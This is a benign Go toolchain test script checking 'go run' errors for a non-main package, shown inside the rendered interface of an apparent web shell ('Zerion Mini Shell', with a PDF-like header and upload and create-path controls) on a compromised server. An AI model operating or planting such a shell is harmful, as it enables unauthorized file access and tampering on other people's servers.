%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /usr/local/go/src/cmd/go/testdata/script/
Upload File :
Create Path :
Current File : //usr/local/go/src/cmd/go/testdata/script/mod_run_nonmain.txt

! go run $PWD
! stderr 'no packages loaded'
stderr '^package example.net/nonmain is not a main package$'

! go run .
stderr '^package example.net/nonmain is not a main package$'

! go run ./...
stderr '^go: warning: "\./\.\.\." matched only non-main packages$'
stderr '^go run: no packages loaded from \./\.\.\.$'

-- go.mod --
module example.net/nonmain

go 1.17
-- nonmain.go --
// Package nonmain is not a main package.
package nonmain

Zerion Mini Shell 1.0